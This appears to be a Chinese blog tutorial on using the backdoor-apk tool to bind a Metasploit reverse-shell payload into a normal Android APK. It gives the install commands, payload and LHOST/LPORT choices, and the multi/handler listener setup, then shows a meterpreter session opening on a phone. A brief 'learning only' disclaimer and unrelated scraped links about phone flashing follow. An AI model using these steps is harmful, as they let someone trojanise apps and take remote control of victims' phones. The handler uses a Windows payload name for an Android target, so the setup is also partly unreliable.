Hello,朋友们大家好,欢迎来到LIUSE网络。

对于渗透测试来讲,一个成功的Backdoor(后门)是非常有价值的!那么今天Liuse就带领大家一起来学习基于安卓apk的后门制作。对于不知道什么是“后门”的同学,请去墙角面壁思过三分钟。什么是后门:后门程序就是留在计算机系统中,供某位特殊使用者通过某种特殊方式控制计算机系统的途径。等于你买了开发商一套房子,开发商在你家后院挖了一条秘密通道,可以随时进出。

在常规情况下,如果我们要想将一个正常无毒的apk文件嵌入进去恶意代码、或者嵌入恶意payload的话那务必要我们动手先去反编译apk文件,找到文件执行入口,并在activety中添加启动PAYLOAD。这对于入门小白来讲是十分的费劲!如此说来,是不是就要凉凉了?NONONONO,接下来鄙人给大家介绍一款神器backdoor-apk!

backdoor-apk 从名字上我们就能猜到用途了,没错就是用来制作 APK 后门的。这个工具,非常简单易用,比手动去找关键点速度多了,完全傻瓜式操作!

首先,让我们对它进行安装,在安装前我们需要先安装它的一些依赖 lib 库文件:

注:这里推荐使用kali系统,后面要用到metasploit,如果你闲麻烦就用kali最方便,你要喜欢折腾用其它的也可以apt-get install lib32stdc++6 lib32ncurses5 lib32z1 #安装lib依赖

这里询问我们,对这些安装的服务,当他们更新时不再进行询问。我们选择 Yes 即可!

在完成以上依赖库的安装后接着我们就可以安装 backdoor-apk 啦!git clone https://github.com/dana-at-cp/backdoor-apk.git #从github下载程序源码

下载完成后我们进入到其文件目录下:

cd backdoor-apk/

cd backdoor-apk/

在当前目录下,我们可以看到一个脚本文件。这里,我们需要提前准备一个用来绑定后门的 APK 文件(这个文件是什么都可以,可以是企鹅、可以是K歌随你来)。./backdoor-apk.sh /root/secist.apk #启动backdoor

选择 3 payload #选择攻击载荷

LHOST:192.168.15.131 #设置IP

LPORT:4444 #设置端口

成功执行以上操作后,会生成一个绑定后门的 secist.apk 文件,默认被保存在 backdoor-apk>>original>>dist目录下!下面我们来启动侦听:

在kali打开metasploituse exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.15.131

set lport 4444

exploit

同时,我将生成的带有后门的 APK 发送至我的手机,并进行安装打开!

如果没有出错的话,现在你的软件是可以正常使用的,只不过,在后台你植入的backdoor也已经运行起来了,并返回给指定地址一个shell。

打开软件后,很快的我们的kali下也会有提示并返回一个meterperter,这说明我们已经获取到shell了!

简单输入一个,查看系统信息的命令:

sysinfo

可以看到目标系统为 安卓6 版本,内核为 linux 3.10.49 架构为 armv7l 。

注:文章有一定攻击性,旨在学习网络安全。请大家在虚拟环境下测试,切勿用于违法犯罪!维护网络安全,是你我共同的责任!

??以上部分素材来自“即刻安全”。

armv7l安卓刷linux,技术讲解-安卓APK快速生成后门(实现手机入侵)相关推荐

  1. 安卓刷量技术揭秘(二) 高级攻防技巧

    标 题: [原创]安卓刷量技术揭秘(二) 高级攻防技巧 作 者: ckis 时 间: 2016-10-02,00:28:27 链 接: http://bbs.pediy.com/showthread. ...

  2. 安卓刷量技术揭秘(一) 工具篇

    转:http://bbs.pediy.com/showthread.php?p=1446927#post1446927 标 题: [原创]安卓刷量技术揭秘(一) 工具篇 作 者: ckis 时 间: ...

  3. 华为p8刷linux系统,普通安卓手机如何刷鸿蒙系统?

    原标题:普通安卓手机如何刷鸿蒙系统? 现在的安卓手机处理器均采用了ARM架构的处理器,鸿蒙操作系统的100万台测试机同样采用了原安卓手机,因此,理论上"鸿蒙"系统可以安装到所有的安 ...

  4. 安卓机顶盒刷linux系统下载,安卓机顶盒刷机 最简单的刷机教程【图文教程】

    拥有安卓机顶盒的亲,可能就会想到要刷机,从而实现更多的功能.那么,安卓机顶盒刷机要怎么做呢?安卓机顶盒刷机有哪些教程,下面让我们一起来看看. 安卓机顶盒刷机 刷机所需物品:电脑.牙签.USB线(两头都 ...

  5. android手机加密失败怎么办,安卓刷机教程_安卓手机TWRP-Recovery模式图文刷机指导...

    教程制作方:极客盟 教程更新日期:2019年10月15日 教程适合机型:(教程的理论适用于所有安卓机器) 现在很多刷机小白,不会刷机,经常在群里或论坛问大神,怎么刷机呀 怎么卡刷啊 怎么操作啊? 今天 ...

  6. 手机可以刷linux系统版本,如何查看自己的设备(手机)能否刷入 Ubuntu Touch

    经常有人问我某某机型能不能刷 Ubuntu Touch , 某某机型什么时候能刷 Ubuntu Touch, 某某机型会不会被适配.听得我都烦,事实上 Ubuntu Touch 官方 WIKI 就有列 ...

  7. android卡刷包自制rom之添加删除,自己修改安卓刷机包ROM教程

    <自己修改安卓刷机包ROM教程>由会员分享,可在线阅读,更多相关<自己修改安卓刷机包ROM教程(3页珍藏版)>请在人人文库网上搜索. 1.安卓个性化刷机包ROM定制教程本教程分 ...

  8. 安卓刷机时代不再!魔趣开源项目创始人宣布:“决定删库跑路了”

    整理 | 郑丽媛 出品 | CSDN(ID:CSDNnews) "刷机",一个 00 后听着可能有些陌生,却能勾起许多 80 后.90 后青春记忆的词语--如今,它可能要进一步退出 ...

  9. 网络盒子android系统版本怎样刷机,咪咕盒子MG100强制刷机rom固件安卓系统包_刷机教程...

    现在的网络盒子很多,当属中国移动最多,但是用户在刷机的时候,有时候只看型号就盲目的找包就开刷 其实这是错误的,因为主板改板较快,批次不同也就意味着安卓刷机包也有不同,所以建议不要盲目的去刷! 下面我来 ...

  10. java刷机_java非智能手机能不能通过刷机安装一个安卓智能系统

    过刷机安装一个安卓智能系统 现在安卓系统火的一塌糊涂,除了苹果以外的很多品牌机都在使用安卓的操作系统,当然也包括很多配置比较高的山寨机,这样一来很多使用java非智能手机的用户心里就开始嘀咕 了.山寨 ...

最新文章

  1. CNN网络加速--Performance Guaranteed Network Acceleration via High-Order Residual Quantization
  2. spring中那些让你爱不释手的代码技巧
  3. 华为浏览器推荐关闭_华为手机的不明照片是哪来的?这3个设置得关闭,否则128G也不够...
  4. 利用FRIDA攻击Android应用程序(一)
  5. ajax+php跨域请求数据库,基于jQuery的ajax跨域请求,PHP作为服务器端代码
  6. oracle中decode和case的使用例子
  7. 开发者都应该知道的15个API
  8. Python高性能HTTP客户端库requests的使用
  9. 21Shares AG将于2月4日在瑞士证券交易所SIX推出全球首个波卡ETP
  10. linux man命令汉化 操作
  11. Spring Boot 设置启动时banner
  12. 蛋壳公寓斥资2亿美元全资收购长租公寓运营商爱上租
  13. 使用命令行打包发布cocostudio资源
  14. 表t_od_use_cnt中没有hour字段,所以hour我们直接
  15. 计算机刷bios版本,详细教你电脑刷bios
  16. ul导航条二级菜单被遮盖
  17. 平面设计必须知道的尺寸列表
  18. Java实现局域网聊天软件分享
  19. 表格处理:换行还是不换行?
  20. java 修饰符 详解,详解Java修饰符

热门文章

  1. Excel技巧:如何将数值改成以万为单位,且保留小数点两位?
  2. macOS 访达的隐藏小技巧
  3. 程序员用实力把公司干倒闭了
  4. 【SpringBoot整合NoSql】-----ElasticSearch的安装与操作篇
  5. fat+linux权限,ubuntu挂载的fat32后文件没有执行权限
  6. 利用Chrome翻译搞定大部分英文文件翻译的工作流
  7. 百度 嵌入式Linux软件研发工程师面试记录
  8. 阿里巴巴android开发规范,阿里巴巴开发手册|阿里巴巴Android开发手册 PDF电子版_最火软件站...
  9. 计算机蓝屏代码0x000000ED,XP系统蓝屏提示错误代码0x000000ED怎么办?
  10. html+css+js学习-01